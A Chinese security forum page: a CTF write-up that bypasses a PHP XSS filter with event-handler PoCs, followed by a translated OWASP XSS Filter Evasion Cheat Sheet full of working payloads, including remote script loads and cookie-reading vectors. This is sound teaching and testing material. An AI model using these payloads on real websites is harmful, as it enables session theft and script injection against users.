Web安全渗透Mosuan 回复了问题 • 5 人关注 • 5 个回复 • 999 次浏览 • 2016-11-22 13:25 • 来自相关话题

【题目3答案】这是一道需要自动弹窗的Xss题

Web安全渗透Mosuan 发表了文章 • 6 个评论 • 527 次浏览 • 2016-11-21 08:35 • 来自相关话题

有好几个东西忘了写了,并且忘了说明详细的规则。
先从我出题的代码说起:
一开始正则如下:

/j|v|&|#|\(|\)|\"|;|formaction|oninput|onblur|cookie|document|window|data|\/\/|%|alert|confirm|:|,|http|<|>|' src=|\.\.|\/\*/
 
这个正则可以用onerror以及autofocus来绕过,我印象里面我记得我写了,不知道咋没写...日了狗了...群里的@春天的春,晴天的晴 利用onerror绕过了,我朋友利用autofocus绕过了,郑凯用onclick不过不能自动弹窗,也怪我没把规则说详细,然后我周末把这两个关键词添加到正则里面了。

$str = strtolower(strip_tags($_GET['idaaatest']));
preg_match($reg, $str, $result);

$num = count($result);
$strcount = strlen($str);
$str2 = substr_count($str,'=');
$str3 = substr_count($str,"'");

echo "你输入的字符为:$str<br><br>";

if($num >= 1 or $str2 > 2 or $str3 > 1 or $strcount > 50){​

上面正则匹配,然后判断字符串是否大于50 or 等号是否大于2个 or 单引号是否大于一个,如果是的话就进入黑名单里面。
 
代码说完了,说说解题思路
http://zone.secevery.com/?/article/329  从这里直接复制url访问会带上编码,导致404,这个小坑很多人都能迅速跳出来。





 
http://zone.secevery.com/ctf/ctf3/helloxsser2.php  题目这里有张图片,cat下图片,可以看到图片尾部有个tips,那个tips就是参数。
随便输入个字符,然后查看源码发现是单引号,也就是说是利用单引号跳出属性,因为尖括号我做了处理,所以跳不出标签。
很多同学尝试alert、confirm发现被过滤了,可以用编码绕过或者prompt也可以弹窗。
圆括号被过滤了,可以利用反引号来代替圆括号。这个我在社区发过:http://zone.secevery.com/?/article/305
 
春天的春,晴天的晴的poc:image' src onerror=prompt`1` c
郑凯的poc:' onclick=\u0061\u006c\u0065\u0072\u0074`A` 1
 
我最大的失误还是忘了限制空格个数,之所以说我最大的失误是因为原本这道题我想让你们了解下url一些好玩东西以及js的。所以我在tips1哪里提示了一下属性的顺序,tips2提到了图片。
 
我的poc:image' onload=prompt`a` src=./2.png?
问号在url中可以说是参数之类的,不影响正常加载资源,所以说onload可以执行。
 
http://zone.secevery.com/ctf/ctf3/helloxsser2.php?idaaatest=image%27%20onload=prompt`a`%20src=./2.png?





 
 
 
  查看全部
有好几个东西忘了写了,并且忘了说明详细的规则。
先从我出题的代码说起:
一开始正则如下:

/j|v|&|#|\(|\)|\"|;|formaction|oninput|onblur|cookie|document|window|data|\/\/|%|alert|confirm|:|,|http|<|>|' src=|\.\.|\/\*/
 
这个正则可以用onerror以及autofocus来绕过,我印象里面我记得我写了,不知道咋没写...日了狗了...群里的@春天的春,晴天的晴 利用onerror绕过了,我朋友利用autofocus绕过了,郑凯用onclick不过不能自动弹窗,也怪我没把规则说详细,然后我周末把这两个关键词添加到正则里面了。

$str = strtolower(strip_tags($_GET['idaaatest']));
preg_match($reg, $str, $result);

$num = count($result);
$strcount = strlen($str);
$str2 = substr_count($str,'=');
$str3 = substr_count($str,"'");

echo "你输入的字符为:$str<br><br>";

if($num >= 1 or $str2 > 2 or $str3 > 1 or $strcount > 50){​


上面正则匹配,然后判断字符串是否大于50 or 等号是否大于2个 or 单引号是否大于一个,如果是的话就进入黑名单里面。
 
代码说完了,说说解题思路
http://zone.secevery.com/?/article/329  从这里直接复制url访问会带上编码,导致404,这个小坑很多人都能迅速跳出来。

404.png

 
http://zone.secevery.com/ctf/ctf3/helloxsser2.php  题目这里有张图片,cat下图片,可以看到图片尾部有个tips,那个tips就是参数。
随便输入个字符,然后查看源码发现是单引号,也就是说是利用单引号跳出属性,因为尖括号我做了处理,所以跳不出标签。
很多同学尝试alert、confirm发现被过滤了,可以用编码绕过或者prompt也可以弹窗。
圆括号被过滤了,可以利用反引号来代替圆括号。这个我在社区发过:http://zone.secevery.com/?/article/305
 
春天的春,晴天的晴的poc:image' src onerror=prompt`1` c
郑凯的poc:' onclick=\u0061\u006c\u0065\u0072\u0074`A` 1
 
我最大的失误还是忘了限制空格个数,之所以说我最大的失误是因为原本这道题我想让你们了解下url一些好玩东西以及js的。所以我在tips1哪里提示了一下属性的顺序,tips2提到了图片。
 
我的poc:image' onload=prompt`a` src=./2.png?
问号在url中可以说是参数之类的,不影响正常加载资源,所以说onload可以执行。
 
http://zone.secevery.com/ctf/ctf3/helloxsser2.php?idaaatest=image%27%20onload=prompt`a`%20src=./2.png?

233222222222222.png

 
 
 
 
条新动态, 点击查看
http://zone.secevery.com/?/article/239
http://zone.secevery.com/?/article/239

XSS Filter Evasion Cheat Sheet 中文版

Web安全渗透Mosuan 发表了文章 • 12 个评论 • 701 次浏览 • 2016-09-26 00:07 • 来自相关话题

原文地址:http://drops.wooyun.org/tips/1955在我另一个大表哥的博客看到的,貌似他不想别人知道他的博客,我就不放出他的博客了。@redfree

译者注:翻译本文的最初原因是当我自己看到这篇文章后,觉得它是非常有价值。但是这么著名的一个备忘录却一直没有人把它翻译成中文版。很多人仅仅是简单的把文中的
各种代码复制下来,然后看起来很刁的发在各种论坛上,不过你要真去认真研读这些代码,就会完全不知所云了。原因是这篇文章最精华的部分是代码的解释而非代
码本身。
一方面为了自己学习,一方面也想让更多国内的xss爱好者去更方便的阅读本文。所以虽然我本身英语很烂,xss技术也很烂,但还是去翻译了这篇文
章。当然这也导致最后翻译出来的文章晦涩难懂、不知所云。这个真心向大家说声抱歉啊,也希望大家能及时帮忙提出文中的翻译错误或其他错误。
另外,在翻译过程中,我发现XSS Filter Evasion Cheat
Sheet原版本身也存在一些技术上的或是描述上的错误。不过虽然我知道原文中某些地方可能出错,但是我也不知道正确的应该是什么样的,还有就是或许原文
本身是对的,但是我理解错了。种种原因吧,最后基本上都按原文在翻译,有些觉得可能存在错误的地方或是我理解不了的地方,我就没有翻译,继续使用英文。希
望大家可以帮忙给出翻译或是解释。
如果大家有能力阅读英文的话,尽量阅读原文,即使要看这个翻译版,也配合英文版一起看。不要让我的翻译错误误人子弟啊。最后希望大家可以和我一起解决翻译中的各种错误,把这个中文版维护好。
谢谢
源文档地址:https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
翻译文档在线阅读:https://www.zybuluo.com/laodao/note/9592
介绍
这篇文章的主要目的是去给应用安全测试者提供一份xss漏洞检测指南。文章的初始内容由RSnake提供给OWASP,从他的xss备忘录:
http://ha.ckers.org/xss.html
。目前这个网页已经重定向到我们这里,我们打算维护和完善它。OWASP的第一个防御备忘录项目:the XSS (Cross Site
Scripting) Prevention Cheat Sheet灵感来源于RSnake的 XSS Cheat
Sheet,所以我们对他给予我们的启发表示感谢。我们想要去创建短小简单的参考给开发者去帮助他们预防xss漏洞,而不是创建一个复杂的备忘录去简单的
告诉他们需要去预防各种千奇百怪的攻击。所以,OWASP备忘录系列诞生了。

测试这个备忘录主要针对那些已经理解了最基本的xss攻击,但是想要深入理解各种过滤器绕过的细微差别的学习者。
请注意大部分的xss攻击向量已经在其代码下方给出了测试过的浏览器列表。

xss 探测器注入下面这些代码,在大多数没有特殊xss向量要求而已遭受脚本攻击的地方将会弹出单词“xss”。使用url编码器去编码你的整个代码。小技巧:如果你是急切的需要快去检测一个页面,通常只需要注入轻量的 "<任意字符>" 标签,然后判断输出点是否受到干扰就可以判断是否xss漏洞了。

';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--
[quote]</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

xss 探测器2如果你没有充足的输入空间去检测页面是否存在xss漏洞。下面这段代码是一个好的简洁的xss注入检测代码。在注入这段代码后,查看页面源代码寻找是否存在看起来像 <XSS verses <XSS这样的输入点从而判断是否存在xss漏洞。[/quote]

'';!--"<XSS>=&{()}

无过滤绕过这是一个常规的xss注入代码,虽然通常它会被防御,但是我们建议首先去尝试它。(引号是不被需要的在任何现代浏览器中,因此这里省略了它。)
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

通过javascript指令实现的图片xss图片xss依靠javascript指令实现。(IE7.0不支持javascript指令在图片上下文中,但是可以在其他上下文触发。下面的例子仅仅展示了一种其他标签依旧通用的原理。)
<IMG SRC="javascript:alert('XSS');">

无引号无分号<IMG SRC=javascript:alert('XSS')>

不区分大小写的xss攻击向量<IMG SRC=JaVaScRiPt:alert('XSS')>

html 实体The semicolons are required for this to work:
<IMG SRC=javascript:alert("XSS")>

重音符混淆如果你的javascript代码中需要同时使用单引号和双引号,那么可以使用重音符(`)来包裹javascript代码。它也经常会非常有用因为xss过滤代码未考虑到这个字符。

<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

畸形的A标签跳过href属性,而直接获取xss实质攻击代码…提出被David Cross ~ 已验证在chrome浏览器

<a onmouseover="alert(document.cookie)">xxs link</a>
此外,chrome浏览器喜欢去不全确实的引号为你。如果你遇到阻碍那么直接省略它们吧,chrome将会正确的帮你不全缺失的引号在URL和script中。

<a onmouseover=alert(document.cookie)>xxs link</a>

畸形的IMG标签最早被 Begeek发现(可以短小而干净的运行于任何浏览器),这个xss向量依靠松散的渲染引擎解析IMG标签中被引号包含的字符串来实现。我猜测它最初是为了正确编码而造成的。这将使它更加困难的去解释HTML标签。

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

fromCharCode如果没有任何形式的引号被允许,你可以eval()一串fromCharCode在javascript来创建任何你需要的xss向量。

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

默认SRC属性去绕过SRC域名检测过滤器
这将绕过绝大多数SRC域名过滤器。插入javascript代码在任何一个事件方法同样适用于热河一个HTML标签,例如Form、
Iframe、Input、Embed等等。他将也允许任何任何该标签的相关事件去替换,例如onblur,
onclick等,后面我们会附加一个可用的事件列表。由David Cross提供,Abdullah Hussam编辑。

<IMG SRC=# onmouseover="alert('xxs')">

默认SRC属性通过省略它的值<IMG SRC= onmouseover="alert('xxs')">


默认SRC属性通过完全不设置它<IMG onmouseover="alert('xxs')">


通过error事件触发alert<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>


十进制html编码引用所有在使用javascript指令的xss示例将无法工作在 Firefox 或 Netscape 8.1+,因为它们使用了 Gecko 渲染引擎。使用 XSS Calculator 获取更多信息。

<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>


结尾没有分号的十进制html编码引用他是经常有用的在绕过寻找"&#XX;"格式的xss过滤,因为大多数人不知道最多允许7位字符的编码限制。这也是有用的对那些对字符串解码像$tmp_string =~ s/.\&#(\d+);./$1/; ,错误的认为一个html编码需要用;去结束。(我是无意中发现)

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
结尾没有分号的十六进制html编码引用
这也是一种实用的xss攻击针对上文的$tmp_string =~ s/.\&#(\d+);./$1/; ,错误的认为数字编码跟随在#后面(十六进制htnl编码并非如此),。使用 XSS Calculator 获取更多信息。

<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>


内嵌TAB用来分开xss攻击代码
<IMG SRC="jav ascript:alert('XSS');">



内嵌被编码的TAB用来分开xss攻击代码
<IMG SRC="jav&#x09;ascript:alert('XSS');">


内嵌换行符去分开xss代码一些网站声称09-13编码的所有字符(十进制)都可以实现这种形式的攻击。这是不正确的。只有09(tab), 10 (换行) 和 13 (回车)可以使用。查看ascii表为更详细的信息。下面四个xss例子展示了这个向量。
<IMG SRC="jav&#x0A;ascript:alert('XSS');">



编码回车符去分开xss代码注意:上面我编写的三个xss字符串比必须的字符串更长,原因是0可以被省略。通常我看到的过滤器假设十六进制和十进制的编码是两到三个字符。正确的应该是一到七个字符。

<IMG SRC="jav&#x0D;ascript:alert('XSS');">


没有分割的javascript指令null字符也可以作为一个xss向量,但是不像上边那样。你需要直接注入它们利用一些工具例如Burp Proxy,或是使用
在你的url字符串里。或者如果你想写你自己的注入工具你可以使用vim(^V^@
会生成null),以及用下面的程序去生成它到一个文本文件中。好吧,我再一次撒谎了。 Opera的老版本(大约 7.11 on
Windows)是脆弱的对于一个额外的字符173(软连字符)。但是null字符
是更加的有用或者帮助我们绕过某些真实存在的过滤器用过变动像这个例子中的。

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out


图片元素中javascript之前的空格和元字符为xssxss过滤拼配模式没有考虑单词"javascript:"中可能存在空格是正确的,因为否则将无法渲染。但是这也导致了错误的假设认为你不可以有一个空格在引号和 "javascript:" 单词之间。事实上你可以插入 1-32编码字符(十进制)中的任何字符。

<IMG SRC=" &#14; javascript:alert('XSS');">


非字母数字字符xssFirefox html解析器设定一个非数字字母字符不是有效的在一个html关键字后面,因此这些字符会被视为空白符或是无效的token在html标签之后。这导致很多xss过滤器错误的认为html标签必须是被空白符隔断的。例如,"<SCRIPT\s" != "<SCRIPT/XSS\s":

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
和上面的原理相同,我们继续扩大,Gecko渲染引擎允许字母、数字、html封装字符以外的任何字符位于事件处理器与等号之间。从而借此绕过xss过滤器。注意这也是适用于重音符如下所示:

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
Yair Amit 提示我有一个小区别在 ie和Gecko 渲染引擎之间是他们仅允许一个一个斜杠在html标签和参数之间,在不使用空格的情况下。这可能是有用的在那些不允许输入空格的系统中。
<SCRIPT/SRC="[url=http://ha.ckers.org/xss.js"></SCRIPT>&#10;]http://ha.ckers.org/xss.js"></SCRIPT>
[/url]
附加的开括号Franz
Sedlmaier提出,利用这个xss向量可以绕过某些检测引擎,因为这些引擎通过拼配最早出现的一对尖括号,并且提取其内部内容作为标签,而没有使用
更加有效的算法例如
Boyer-Moore(寻找打开的尖括号以及相关标签的模糊拼配)。代码中的双斜杠可以抑制额外尖括号导致的javascript错误。
<<SCRIPT>alert("XSS");//<</SCRIPT>


没关闭的script标签
对于使用了 Gecko渲染引擎的Firefox 和 Netscape 8.1
,你并不需要常规xss中"></SCRIPT>"这部分。 Firefox会帮你闭合标签,并且加入结束标签。多么的体贴啊!
Unlike the next one, which doesn't effect Firefox, this does not require
any additional HTML below it.
如果需要,你可以加入引号,但通常他并不是必须的。注意,我并不清楚这个代码被注入后html代码会闭合成什么样子。

<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >


script标签中的协议解析这个特殊的变体由 Łukasz Pilorz 提出,并且基于上文中 Ozh提出的协议解析绕过。这个xss例子工作在 IE,
使用IE渲染引擎的Netscape 以及加了在结尾的 Opera。这是非常有用的在输入长度受到限制。域名越短越好。
".j"是有效的,不需要考虑编码问题因为浏览拿起可以自动识别在一个script标签中。

<SCRIPT SRC=//ha.ckers.org/.j>


半开的HTML/JavaScript xss向量不同于 Firefox
,ie渲染引擎不会加入额外的数据到你的页面。但是它允许javascript指定在图片标签中这是有用的作为一个xss向量,因为它不需要一个结束的尖
括号。你可以插入这个xss向量在任何html标签后面。甚至没有用">"关闭标签。 A note: this does mess up
the HTML, depending on what HTML is beneath it. It gets around the
following NIDS regex:
/((\%3D)|(=))[^\n]*((\%3C)|<)[^\n]+((\%3E)|>)/ because it doesn't
require the end ">". 这也是有效的去对付真实的xss过滤器,我曾经碰见过试用半开的<IFRAME 标签替代
<IMG 标签,

<IMG SRC="javascript:alert('XSS')"


双开尖括号使用一个开始尖括号(<)在向量结尾代替一个关闭尖括号(>)会有不同的影响在 Netscape Gecko 的渲染中。 Without it, Firefox will work but Netscape won't。

<iframe src=http://ha.ckers.org/scriptlet.html <


转义javascript中的转义当一个应用程序是输出用户自定义的信息到javascript代码中,例如: <SCRIPT>var
a="$ENV{QUERY_STRING}";</SCRIPT>。如果你想插入你自己的javascript代码进入它,但是服务器转义
了其中的某些引号,这时你需要通过转义被转义的字符来绕过它。从而使最终的输入代码类似于<SCRIPT>var
a="\";alert('XSS');//";</SCRIPT>
。最终\转义了双引号前被服务器添加的\,而双引号则不会被转义,从而触发xss向量。xss定位器使用这个方法。

\";alert('XSS');//


闭合title标签这是一个简单的xss向量,可以引入一个恶意的xss攻击。译者注:titile标签内部不支持html代码,所有内容会被自动转义为普通字符。
</TITLE><SCRIPT>alert("XSS");</SCRIPT>


INPUT image<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">


BODY image<BODY BACKGROUND="javascript:alert('XSS')">


IMG DYNSRC(视频剪辑)<IMG DYNSRC="javascript:alert('XSS')">


IMG lowsrc(低分辨率图片)<IMG LOWSRC="javascript:alert('XSS')">


List-style-image<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>


List-style-image为带有符号的列表嵌入自定义图片的符号。它是只能工作在ie渲染引擎因为javascript指令。这不是一个特别有用的xss向量。
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>


VBscript in an image<IMG SRC='vbscript:msgbox("XSS")'>



Livescript (仅适用于老版本的Netscape)<IMG SRC="livescript:">


BODY 标签这个方法不需要使用任何"javascript:" or "<SCRIPT..." 的变体去实现xss攻击。Dan Crowley特别指出你可以额外的加入一个空格在等号之前("onload=" != "onload ="):
<BODY ONLOAD=alert('XSS')>



事件处理程序它可以被用于上文中的一些共性xss攻击(这是最完整的一个实时更新的在线列表)。感谢Rene Ledosquet 的更新。此外你可以参考 Dottoro Web Reference 或是 events in JavaScript.
1. FSCommand() (攻击者可以使用它当执行一个嵌入的flash对象时)
2. onAbort() (当使用者终止一张正在载入的图片)
3. onActivate() (当对象被设置为激活元素)
4. onAfterPrint() (用户打印或是预览打印工作后激活)
5. onAfterUpdate() (激活在一个数据对象当源对象数据更新后)
6. onBeforeActivate() (触发在一个对象被设置为激活元素)
7. onBeforeCopy() (攻击者执行攻击代码在一个选区被复制到剪贴板之前-攻击者可以实现它通过execCommand("Copy")函数。)
8. onBeforeCut() (攻击者执行攻击代码在在一个选区被剪贴。)
9. onBeforeDeactivate() (当激活元素被改变后触发)
10. onBeforeEditFocus() (触发在一个可被编辑的元素内的对象就按测到一个 UI-activated状态或是一个可被编辑对象被选择之前)
11. onBeforePaste() (用户需要被欺骗执行粘贴或是去触发它通过execCommand("Paste")函数。)
12. onBeforePrint() (用户需要被欺骗执行打印或是攻击者可以使用print()或是execCommand("Print")函数。)
13. onBeforeUnload() (用户需要被欺骗关闭浏览器-攻击者不可以 unload windows除非它是被执行从其父窗口。)
14. onBeforeUpdate() (激活在数据对象在源对象更新数据之后。)
15. onBegin() (onbegin 事件被立即触发当元素的声明周期开始后)
16. onBlur() (当失去焦点时触发*)
17. onBounce() (触发当选框对象的behavior属性被设置为"alternate"或是选框的内容抵达窗口的一边。)
18. onCellChange() (触发当数据改变在数据provider)
19. onChange() (select, text, or TEXTAREA 字段失去焦点或是它们的值是被改变。)
20. onClick()(点击事件)
21. onContextMenu() (用户需要右击在攻击攻击区域)
22. onControlSelect() (当用户去控制一个选择对象时触发。)
23. onCopy() (用户需要去copy某些东西或是利用execCommand("Copy")命令)
24. onCut() (用户需要copy某些东西或是利用execCommand("Cut") 命令)
25. onDataAvailable() (用户改变数据在某个元素上或是攻击者可以执行相同的函数。)
26. onDataSetChanged() (当源数据对象被改变时触发)
27. onDataSetComplete() (触发当数据是成功获取到从数据源对象)
28. onDblClick() (用户双击某个元素。)
29. onDeactivate() (当当前元素失去激活状态时触发)
30. onDrag() (需要用户拖动某个对象)
31. onDragEnd() (需要用户拖动某个对象)
32. onDragLeave() (需要用户拖动某个对象从一个有效的位置。)
33. onDragEnter() (需要用户拖动某个对象从一个有效的位置。)
34. onDragOver() (需要用户拖动某个对象从一个有效的位置。)
35. onDragDrop() (用户拖动某个对象(例如文件)到浏览器窗口内。)
36. onDragStart() (当用户开始拖动操作时发生。)
37. onDrop() (用户拖动某个对象(例如文件)到浏览器窗口内。)
38. onEnd() (当生命周期结束时触发)
39. onError() (载入document 或 image发生错误时触发)
40. onErrorUpdate() (当更新数据源的相关对象时发生错误则触发)
41. onFilterChange() (当一个滤镜完成状态改变时触发)
42. onFinish() (移动的Marquee文字完成一次移动时触发)
43. onFocus() (当窗口获得焦点时攻击者可以执行代码)
44. onFocusIn() (当窗口获得焦点时攻击者可以执行代码)
45. onFocusOut() (当窗口失去焦点时攻击者可以执行代码)
46. onHashChange() (当当前地址的hash发生改变时触发)
47. onHelp() (当用户在当前窗口点击F1时触发攻击代码)
48. onInput() (可编辑元素中的内容被用户改变后出发)
49. onKeyDown() (用户按下一个键)
50. onKeyPress() (用户点击或是按下一个键)
51. onKeyUp() (用户释放一个键)
52. onLayoutComplete() (用户需要去打印或是打印预览)
53. onLoad() (攻击者执行攻击代码在窗口载入后)
54. onLoseCapture() (可以被触发被releaseCapture() 方法)
55. onMediaComplete() (当波翻改一个流媒体文件时,这个事件将触发在文件开始播放前。)
56. onMediaError() (当用户打开的页面包含一个媒体文件,并且发生错误时触发)
57. onMessage() (当文档对象接受到一个信息时触发)
58. onMouseDown() (攻击者需要让用户去点击一张图片。)
59. onMouseEnter() (光标移入一个对象或是区域)
60. onMouseLeave() (攻击者需要让用户移动光标进入一个图片或是表格,接着再次移出)
61. onMouseMove() (攻击者需要让用户移动鼠标进入一个图片或是表格上)
63. onMouseOver() (光标移到一个对象或是区域上)
64. onMouseUp() (攻击者需要让用户点击一张图片)
65. onMouseWheel() (拥挤着需要让用户去使用他们的鼠标滚轮)
66. onMove() (用户或攻击者需要移动页面)
67. onMoveEnd() (用户说攻击者需要移动页面)
68. onMoveStart() (用户说攻击者需要移动页面)
69. onOffline() (浏览器从在线模式转换到离线模式时发生)
70. onOnline() (浏览器从离线模式转换到在线模式时发生)
71. onOutOfSync() (interrupt the element's ability to play its media as defined by the timeline)
72. onPaste() (用户需要去粘贴或是攻击者执行execCommand("Paste") 方法)
73. onPause() (当激活元素时间停顿时触发,包括body元素)
74. onPopState() (当用户返回会话历史时触发)
75. onProgress() (当一个flash动画载入时触发)
76. onPropertyChange() (用户或攻击者需要改变一个元素的属性)
77. onReadyStateChange() (用户或攻击者需要改变一个元素的属性)
78. onRedo() (用户执行再执行操作)
79. onRepeat() (the event fires once for each repetition of the timeline, excluding the first full cycle)
80. onReset() (用户或攻击者重置表单)
81. onResize() (用户调整窗口大小,或是攻击者自动触发通过某些代码例如&#x3C;SCRIPT>self.resizeTo(500,400);&#x3C;/SCRIPT>)
82. onResizeEnd() (用户调整窗口大小,或是攻击者自动触发通过某些代码例如&#x3C;SCRIPT>self.resizeTo(500,400);&#x3C;/SCRIPT>)
83. onResizeStart() (用户调整窗口大小,或是攻击者自动触发通过某些代码例如&#x3C;SCRIPT>self.resizeTo(500,400);&#x3C;/SCRIPT>)
84. onResume() (当元素从暂停恢复到激活时触发,包括body元素)
85. onReverse() (if the element has a repeatCount greater than one, this event fires every time the timeline begins to play backward)
86. onRowsEnter() (用户或攻击者需要改变数据源中的一行)
87. onRowExit() (用户或攻击者需要改变数据源中的一行)
88. onRowDelete() (用户或攻击者需要删除数据源中的一行)
89. onRowInserted() (用户或攻击者需要向数据源中插入一行)
90. onScroll() (用户需要滚动,或是攻击者可以执行scrollBy() 函数)
91. onSeek() (媒体播放移动到新位置)
92. onSelect() (用户需要去选择一些文本 - 攻击者可以自动运行利用某些方法例如 window.document.execCommand("SelectAll");)
93. onSelectionChange() (用户需要去选择一些文本 - 攻击者可以自动运行利用某些方法例如 window.document.execCommand("SelectAll");)
94. onSelectStart() (用户需要去选择一些文本 - 攻击者可以自动运行利用某些方法例如 window.document.execCommand("SelectAll");)
95. onStart() (当marquee元素循环开始时触发)
96. onStop() (用户需要点击停止按钮或是离开网页)
97. onStorage() (存储区域改变)
98. onSyncRestored() (user interrupts the element's ability to play its media as defined by the timeline to fire)
99. onSubmit() (需要攻击者或用户提交表单)
100. onTimeError() (用户或攻击者需要设置一个时间属性例如 dur 的值为无效的值)
101. onTrackChange() (用户或攻击者需要改变播放列表的轨迹)
102. onUndo() (user went backward in undo transaction history)
103. onUnload() (当用户点击一个链接或是按下回车键或是攻击者触发一个点击事件)
104. onURLFlip() (this event fires when an Advanced Streaming Format (ASF) file, played by a HTML+TIME (Timed Interactive Multimedia Extensions) media tag, processes script commands embedded in the ASF file)
105. seekSegmentTime() (this is a method that locates the specified point on the element's segment time line and begins playing from that point. The segment consists of one repetition of the time line including reverse play using the AUTOREVERSE attribute.)




BGSOUND(背景音乐)<BGSOUND SRC="javascript:alert('XSS');">


& JavaScript 包含<BR SIZE="&{alert('XSS')}">


样式表<LINK REL="stylesheet" HREF="javascript:alert('XSS');">



远程样式表(通过某些方式例如最简单的远程样式表,你可以插入一个样式参数为嵌入表达式的xss代码)。它是仅仅工作在IE浏览器或是使用了IE渲染引擎的
Netscape
8.1+。需要注意的是页面中并没有展现出它包含了javascript代码。注意:所有的远程样式表示例需要至少用到body标签,负责将无法工作除非
页面中包含除了向量本身的其他内容。因此你需要添加至少一个字母到页面确保他可以工作如果它是一个空白页面。

<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">



 远程样式表2他的工作原理与上面相同。但是使用了STYLE标签代替LINK标签。榆次向量稍有不同的变异被用于攻击Google Desktop。你可以移除</STYLE>标签当后面的html去闭合它。这个向量是有用的在不允许输入等号或是反斜杠的实际环境中。

<STYLE>@import'[url=http://ha.ckers.org/xss.css';</STYLE>&#10;]http://ha.ckers.org/xss.css';</STYLE>
[/url]
远程样式表3它仅仅可以工作在 Opera 8.0 (no longer in 9.x) ,但是是非常的狡猾。 Opera 8.0 (no longer
in 9.x) 。根据RFC2616规定,设置一个连接头不是 HTTP1.1 规定的一部分,但是很多浏览器仍然允许它(例如Firefox
and Opera)。这个技巧是我们可以设置一个http头(与常规http头没有什么不同,只是 Link: http://ha.ckers.org/xss.css; REL=stylesheet)。这样带有xss代码的远程向量将运行javascript。他并不被支持在 FireFox。

<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">


远程样式表4它是仅仅工作在 Gecko 渲染引擎。并且需要绑定一个 XUL文件在页面。令人讽刺的是Netscape认为Gecko是更加安全的,因此绝大多是网站会受到这个攻击。

<STYLE>BODY{-moz-binding:url("[url=http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>&#10;]http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>[/url]


分隔javascript在STYLE标签这个xss在ie浏览器中会造成无线循环

<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>


STYLE属性中使用注释去分隔表达式提出被 Roman Ivanov
<IMG STYLE="xss:expr/[i]XSS[/i]/ession(alert('XSS'))">



IMG样式的表达式这是上面xss向量的混合体。但是它是展示了STYLE标签被分隔有多困难。同样它也会在ie下造成循环弹窗。

exp/[i]<A STYLE='no\xss:noxss("[/i]//*");
xss:ex/[i]XSS[/i]//[i]/[/i]/pression(alert("XSS"))'>


STYLE标签(仅支持老版本的Netscape)<STYLE TYPE="text/javascript">alert('XSS');</STYLE>


使用background-image的style标签<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>


使用background的style标签<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>



匿名html标签的属性IE6.0 和使用了ix渲染引擎的Netscape 8.1+ 并不会关心你建立的html标签存在与否。只要它是以尖括号以及字符开始的。

<XSS STYLE="xss:expression(alert('XSS'))">


本地 htc 文件它有一个小的不同与上面的xss向量,因为他使用的 htc 文件必须是当前域的文件。这个文件通过样式属性引入并运行javascript代码实现xss。

<XSS STYLE="behavior: url(xss.htc);">


US-ASCII编码
US-ASCII 编码 (发现被 Kurt Huwig)。它是使用畸形的ASCII 编码用7bits代替8bits.
这个xss可以绕过绝大多数内容过滤,但是必须当前域的传输形式为 US-ASCII编码方式。或者你自己去设置这种编码方式
。它是有用的去绕过web应用防火墙xss过滤比服务器端的过滤。Apache的 Tomcat是众所周知的 使用US-ASCII编码传输协议。

¼script¾alert(¢XSS¢)¼/script¾


META关于meta refresh比较奇怪的是他并不是发送一个刷新请求头。因此他通常用于不需要引用url的攻击。

<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">


META using dataURL指令方案,它是非常的不错因为赢没有明显的SCRIPT单词或是JavaScript 指令出现,因为它使用了base64 编码。请查看 RFC 2397了解更多信息或是编码你的代码。你也可以使用 XSS calculator去编码你的html或是javascript代码到base64位。

<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">

 
额外url参数的META如果当前网页试图去查找URL参数是否以"http://" 开始,你可以用下列技术绕过(被 Moritz Naumann提出)

<META HTTP-EQUIV="refresh" CONTENT="0; URL=[url=http://;URL=javascript:alert('XSS');">&#10;]http://;URL=javascript:alert('XSS');">
[/url]
IFRAME如果一个iframes被允许,那么同时可能会存在大量其他xss问题

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>


IFRAME 基于事件IFrames或其他元素可以使用事件如下(提出被 David Cross)
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>



FRAMEFrames有一些列相同的问题像 iframes
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>


TABLE<TABLE BACKGROUND="javascript:alert('XSS')">



